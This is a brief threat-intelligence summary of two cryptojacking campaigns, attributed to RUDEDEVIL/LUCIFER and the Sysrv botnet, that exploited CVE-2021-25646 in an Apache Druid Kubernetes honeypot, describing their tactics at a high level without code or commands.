ARMO’s research team uncovered two cryptojacking campaigns targeting a deliberately exposed Kubernetes honeypot running Apache Druid, leveraging the known CVE-2021-25646 vulnerability for unauthenticated remote code execution. The first campaign, linked to the RUDEDEVIL/LUCIFER malware family, began with automated scans and DNS callbacks for exploit verification, followed by the deployment of XMRig miners and execution of bash scripts to optimize system resources and maintain persistence. The malware connected to Monero mining pools and exfiltrated logs, indicating a well-coordinated mining operation that had already compromised at least 26 systems and earned roughly 110 XMR.
The second campaign, attributed to the Sysrv botnet, used similar initial access via the same Druid vulnerability but leveraged different infrastructure and tooling, including a loader script (ldr.sh) and platform-specific binaries (sys.x86_64). Sysrv’s tactics included disabling firewalls, removing competing miners, enabling persistence, and preparing for lateral movement by collecting SSH keys. The botnet also contained embedded exploits for other platforms like Atlassian and Apache.